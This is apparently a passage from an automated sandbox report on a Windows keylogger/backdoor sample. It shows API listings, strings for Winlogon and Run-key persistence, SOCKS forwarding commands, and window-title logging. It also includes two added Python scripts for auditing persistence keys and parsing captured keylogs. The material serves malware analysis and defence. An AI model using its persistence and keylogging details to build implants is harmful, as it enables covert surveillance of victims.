                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 00407187
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 004071A7
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(explorer.exe, ,?,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888), ref: 004071C9
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004074CA), ref: 004071D4
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(00000001,00000000), ref: 004071E1
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004071EB
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040720D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407216
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040721F
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe, ,?,0041409C,00419958,0041409C,00000001,00419994,00419958,00413888), ref: 00407241
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040724C
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407259
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407263
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407285
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040728E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407297
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0041409C,00000001,00419994), ref: 004072DB
                                                Strings
                                                • Software\Microsoft\Windows NT\CurrentVersion\Winlogon\, xrefs: 004071F8, 00407270
                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 004072C6
                                                • C:\WINDOWS\system32\userinit.exe, , xrefs: 0040723C
                                                • Userinit, xrefs: 0040726B
                                                • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040714E, 00407192
                                                • explorer.exe, , xrefs: 004071C4
                                                • Shell, xrefs: 004071F3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$G@2@@0@Hstd@@V?$basic_string@$??1?$basic_string@$V10@$V10@@$??0?$basic_string@G@1@@V10@0@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                • String ID: C:\WINDOWS\system32\userinit.exe, $Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Userinit$explorer.exe,
                                                • API String ID: 3489422410-3841441107
                                                • Opcode ID: 8217f85f80baf3a493a0c19dce6838968a804ba217b3b14124a8fd15949ae73a
                                                • Instruction ID: f779ddf5d10224dd3a0bdae119fd7e47ebf2fabcfa4eac336a0a7ef85d89992a
                                                • Opcode Fuzzy Hash: 8217f85f80baf3a493a0c19dce6838968a804ba217b3b14124a8fd15949ae73a
                                                • Instruction Fuzzy Hash: A841BC71D002147BDB00BFA2DC4AEEF7F3CDB24311F004469F519A1192E6B996A8C7AA
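The string references in this function (Winlogon\Shell, Winlogon\Userinit, CurrentVersion\Run and the less-watched Policies\Explorer\Run) together with the Create/Value/Close API tokens in the API ID point at registry-based persistence: the Shell and Userinit values accept a comma-separated program list, so an implant can append itself after the legitimate explorer.exe or userinit.exe entry and still let the logon complete. The script below is an added example written for this page, not code from the report or from the sample. It audits those exact locations against their documented defaults (Shell = "explorer.exe", Userinit = "C:\Windows\system32\userinit.exe," with its normal trailing comma) and applies a labelled heuristic to Run entries. The registry snapshot is constructed inline so the check runs offline; on a live host the same mapping would be filled from winreg.QueryValueEx.

```python
"""Audit the Winlogon and Run persistence locations referenced above."""
import re

WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
RUN_KEYS = [
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
]
# Heuristic (an assumption, not a rule from the report): Run entries that
# launch from user-writable directories deserve a second look.
SUSPICIOUS_DIRS = re.compile(
    r"\\(AppData|Temp|ProgramData|Users\\Public|Startup)\\", re.I)


def _entries(data):
    """Shell/Userinit hold comma-separated program lists; normalise them."""
    return [e.strip().strip('"').lower() for e in data.split(",") if e.strip()]


def audit_winlogon(values):
    """values maps value names to data for the Winlogon key.

    Returns (key, value_name, data, reason) tuples for deviations from the
    documented defaults.
    """
    findings = []
    shell = _entries(values.get("Shell", "explorer.exe"))
    if shell != ["explorer.exe"]:
        findings.append((WINLOGON, "Shell", values["Shell"], "extra Shell entry"))
    userinit = _entries(values.get("Userinit", r"C:\Windows\system32\userinit.exe,"))
    # Exactly one entry, and it must be the real userinit.exe (any drive letter).
    if len(userinit) != 1 or not userinit[0].endswith(r"\system32\userinit.exe"):
        findings.append((WINLOGON, "Userinit", values["Userinit"], "extra Userinit entry"))
    return findings


def audit_run_keys(snapshot):
    """Flag Run / Policies\\Explorer\\Run entries launching from user-writable paths."""
    findings = []
    for key in RUN_KEYS:
        for name, data in snapshot.get(key, {}).items():
            if SUSPICIOUS_DIRS.search(data):
                findings.append((key, name, data, "launches from user-writable path"))
    return findings


def audit(snapshot):
    """snapshot: {key_path: {value_name: data}} for the keys of interest."""
    return audit_winlogon(snapshot.get(WINLOGON, {})) + audit_run_keys(snapshot)


# Constructed sample snapshot (not taken from the report): a benign HKLM Run
# entry, a Userinit value with an appended second program, and a
# Policies\Explorer\Run entry pointing into %APPDATA%.
SAMPLE_SNAPSHOT = {
    WINLOGON: {
        "Shell": "explorer.exe",
        "Userinit": r"C:\WINDOWS\system32\userinit.exe,C:\Users\u\AppData\Roaming\svc.exe",
    },
    RUN_KEYS[0]: {"SecurityHealth": r"C:\Windows\system32\SecurityHealthSystray.exe"},
    RUN_KEYS[2]: {"upd": r"C:\Users\u\AppData\Roaming\upd\upd.exe"},
}

if __name__ == "__main__":
    for key, name, data, why in audit(SAMPLE_SNAPSHOT):
        print(f"{why}: {key}\\{name} = {data}")
```

Both Winlogon checks are strict on purpose: a second comma-separated entry is the whole technique, so anything beyond the single default program is reported regardless of what it points to. The Run-key check is only a heuristic and should be read alongside the report's own file-drop and startup-folder findings.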
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,00419D80,00000000), ref: 004021B0
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 004021C8
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004021D7
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004021E1
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 004021FA
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402203
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402211
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00419DB4), ref: 00402222
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402242
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 0040225A
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040226C
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6C995E04), ref: 00402282
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040228C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402295
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004022A6
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004022B0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004022B9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004022CD
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004022E3
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004022ED
                                                • CreateThread.KERNEL32(00000000,00000000,a!@,00419D80,00000000,00000000), ref: 004022FE
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402309
                                                • CloseHandle.KERNEL32(00000000), ref: 00402312
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,004127D0,6C995E04), ref: 00402327
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402331
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040233A
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402343
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402355
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402363
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                                • String ID: a!@
                                                • API String ID: 3745950881-1276587126
                                                • Opcode ID: 856be9f4f3ce7ac650e4e88518b6d7f38fce8677c82795bf3c5a11abacb395d9
                                                • Instruction ID: 3de6d7aca83b72bfd5d2aa926936ec4f0bce37afc633d687db95027be15d9cc5
                                                • Opcode Fuzzy Hash: 856be9f4f3ce7ac650e4e88518b6d7f38fce8677c82795bf3c5a11abacb395d9
                                                • Instruction Fuzzy Hash: 4451EB7650010AEFCF04AFA4DD9DCEE7F78FF05346B008569F506A21A0DB74AA85CB98
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098A4
                                                • SetEvent.KERNEL32(?), ref: 004098AD
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004098B6
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 004098CE
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 004098DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098EE
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • inet_ntoa.WS2_32 ref: 00409945
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409958
                                                • atoi.MSVCRT(00000000), ref: 0040995F
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,fwdsocks), ref: 0040998A
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040999D
                                                • atoi.MSVCRT(00000000), ref: 004099A4
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000077), ref: 004099CA
                                                • CloseHandle.KERNEL32(00000000), ref: 004099D1
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 004099E8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00409A8F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,004135D4), ref: 00409ABF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00419288,004135D4), ref: 00409ACC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,004135D8), ref: 00409B01
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00419288,004135D8), ref: 00409B0E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,00419288,004135D8), ref: 00409B25
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00419288,004135D8), ref: 00409B36
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00419288,004135D8), ref: 00409B3F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@EventV10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@CloseCreateD@1@@HandleObjectSingleV01@Waitinet_ntoa
                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$fwdsocks
                                                • API String ID: 2730387600-1054587981
                                                • Opcode ID: b5e008b3dedb12d675bf83900b825b5c8bd3ef932ac85d2a881dc7822cde3202
                                                • Instruction ID: 0bd2c6c8d8ccaf5e7f6ce26a3cbf7b6bcedfd01191e7a593f2c8c0ae57ac7274
                                                • Opcode Fuzzy Hash: b5e008b3dedb12d675bf83900b825b5c8bd3ef932ac85d2a881dc7822cde3202
                                                • Instruction Fuzzy Hash: 36719171A00204ABCF04BBB5DC5A9EE7B7CFB41705B10853EF502A61E1EE799941CB9D
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404D6A
                                                • Sleep.KERNEL32(000001F4), ref: 00404D80
                                                • GetForegroundWindow.USER32 ref: 00404D82
                                                • GetWindowTextLengthA.USER32(00000000), ref: 00404D8B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00404DA0
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404DB1
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404DBB
                                                • GetWindowTextA.USER32(00000000,00000000), ref: 00404DC3
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,004198C8), ref: 00404DD2
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00404DE7
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404DF0
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00404DFB
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ]), ref: 00404E1A
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ]), ref: 00404E24
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404E39
                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?, ]), ref: 00404E7E
                                                • _itoa.MSVCRT ref: 00404E90
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00404EB0
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00404EC0
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00404ECA
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EDC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EE5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EEE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404EFC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_string@D@1@@V01@V01@@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                                • String ID: [ ${ User has been idle for $ ]$ minutes }
                                                • API String ID: 2152833798-3343415809
                                                • Opcode ID: 533441691e86934712fd24c7b2590e1f7961e04cf213b1c6e1bb565e8ede0f2f
                                                • Instruction ID: 525058fa33ed8dfd7edab486fe9c63d3967e1beeaa0c89e5b4ce229fbc2f24eb
                                                • Opcode Fuzzy Hash: 533441691e86934712fd24c7b2590e1f7961e04cf213b1c6e1bb565e8ede0f2f
                                                • Instruction Fuzzy Hash: 8D513071900109ABDB01BBA0DC49AEE7B78EF45716F04847AF601F21D1DB789A89CB9D
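This function is the window-title tracker of the keylogger: every 500 ms (Sleep 0x1F4) it reads the foreground window title with GetForegroundWindow / GetWindowTextA, and when the title changes it writes "[ <title> ]" into the log; a separate branch writes "{ User has been idle for <n> minutes }" built with _itoa. Knowing the markers makes the captured log easy to triage during incident response. The parser below is an added example for this page, not code from the report or the sample: the two marker formats are taken from the strings above, while the sample buffer, the assumption that keystrokes are stored verbatim between markers, and the grouping helper are mine.

```python
"""Parse a keylog buffer that uses the window/idle markers seen above."""
import re

# Marker formats from the string constants in this function; the captured
# keystrokes between markers are assumed to be stored verbatim.
TOKEN = re.compile(
    r"\[ (?P<title>.*?) \]"                                  # active-window change
    r"|\{ User has been idle for (?P<idle>\d+) minutes \}",  # idle notice
    re.S,
)


def parse_keylog(buf):
    """Split a keylog buffer into ('window', title), ('keys', text) and
    ('idle', minutes) events, in the order they were recorded."""
    events, pos = [], 0
    for m in TOKEN.finditer(buf):
        if m.start() > pos:                       # keystrokes before this marker
            events.append(("keys", buf[pos:m.start()]))
        if m.group("title") is not None:
            events.append(("window", m.group("title")))
        else:
            events.append(("idle", int(m.group("idle"))))
        pos = m.end()
    if pos < len(buf):                            # trailing keystrokes
        events.append(("keys", buf[pos:]))
    return events


def keys_by_window(events):
    """Group captured keystrokes under the window that had focus."""
    grouped, current = {}, None
    for kind, value in events:
        if kind == "window":
            current = value
        elif kind == "keys":
            grouped[current] = grouped.get(current, "") + value
    return grouped


# Constructed sample buffer (not a real capture from this analysis).
SAMPLE = (
    "[ Untitled - Notepad ]meeting notes"
    "[ Sign in - Google Chrome ]user@example.test\tpass123\r\n"
    "{ User has been idle for 15 minutes }"
    "[ Untitled - Notepad ]back"
)

if __name__ == "__main__":
    for kind, value in parse_keylog(SAMPLE):
        print(kind, repr(value))
    print(keys_by_window(parse_keylog(SAMPLE)))
```

The title pattern is non-greedy, so a title containing " ]" would be cut short; if a victim's window titles can contain that sequence, anchor the parser on the "[ " that follows a newline in the real log layout rather than on the bare marker.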
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004093F3
